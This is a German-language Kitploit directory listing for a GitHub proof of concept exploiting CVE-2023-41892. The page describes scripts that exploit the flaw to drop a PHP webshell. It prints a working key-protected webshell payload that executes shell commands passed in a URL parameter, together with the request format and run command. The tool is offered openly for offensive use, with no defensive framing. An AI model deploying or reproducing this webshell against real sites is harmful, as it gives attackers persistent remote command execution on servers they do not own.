Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-41892_poc — Für meine eigene Nutzung angepasst | Kitploit
Tools/GitHubGitHub/user01-1/cve-2023-41892_poc
Payload-GenerierungSchwachstellenanalyseExploitationShellcodeWebanwendungs-ExploitationCommand and Control
GitHubuser01-1/cve-2023-41892_poc

CVE-2023-41892_poc

Für meine eigene Nutzung angepasst

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-41892_poc

Für meine eigene Verwendung angepasst

poc_noauth.py

  • Einfache einzeilige PHP-Webshell
  • OS-Befehlsausführung über ?cmd=<명령어>

poc_auth.py

  • Webshell mit einfacher schlüsselbasierter Authentifizierung (SHA-256-Hashvergleich)
  • Befehlsausführung nur mit dem korrekten Schlüssel möglich
  • Codeänderung erforderlich:
    • Ersetze in der Variable webshell innerhalb der Funktion drop_payload den Teil YOUR_SECRET_KEY durch den SHA-256-Hashwert des gewünschten Schlüssels
  • Verwendung:
    1. Ersetze YOUR_SECRET_KEY in webshell durch den SHA-256-Hashwert des Klartextschlüssels
    2. Übergebe beim Senden der Anfrage den Klartextschlüssel
      root@kitploit:~
      {target}/shell.php?k=<평문키>&c=<명령어>
      
Tool herunterladen
  • Beispiel:
    1. Einstellung: Klartextschlüssel = test1234
    2. SHA-256-Hash z. B. mit cyberchef erzeugen: 937e8d5fbb48bd4949536cd65b8d35c426b80d2f830c5c308e2cdec422ae2244
      • echo -n test1234 | sha256sum
      • cyberchef usw.
    3. Codeänderung:
      root@kitploit:~
      webshell = """<?php const K='937e8d5fbb48bd4949536cd65b8d35c426b80d2f830c5c308e2cdec422ae2244';if(hash('sha256',$_GET['k']??'')!==K)die; if(isset($_GET['c']))echo'<pre>'.shell_exec($_GET['c']); ?>"""
      
  • Verwendung

    python poc_noauth.py {타겟}